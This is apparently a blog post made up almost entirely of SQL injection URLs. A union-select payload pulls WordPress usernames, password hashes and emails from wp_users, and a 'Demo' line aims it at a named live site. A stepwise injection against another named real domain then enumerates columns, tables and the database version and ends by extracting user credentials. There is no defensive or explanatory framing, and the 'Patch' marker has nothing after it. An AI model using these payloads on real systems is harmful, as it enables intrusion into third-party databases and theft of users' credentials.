# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),
6+from+wp_users
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),
6+from+wp_users--
-----------------------------------------------------------------------------------------------------------------
http://www.teledata.co.id/news_detail.php?nid=-11+order+by+4--
http://www.teledata.co.id/news_detail.php?nid=-11+union+select+1,2,3,4--
http://www.teledata.co.id/news_detail.php?nid=-11+union+select+1,version(),3,4--
http://www.teledata.co.id/news_detail.php?nid= -11+union+select+1,group_concat(table_name),3,4
+from+information_schema.tables+where+table_schema=database()--
http://www.teledata.co.id/news_detail.php?nid= -11+union+select+1,group_concat(column_name),3,4
+from+information_schema.columns+where+table_name=0x6d79636d735f7573657273---------------------------------------------------------Patch--------------------------------------------------------- (Continue)..
http://www.teledata.co.id/news_detail.php?nid= -11+union+select+1,concat_ws(0x3a,userid,username,password),3,4+from+mycms_users--
0 komentar:
Posting Komentar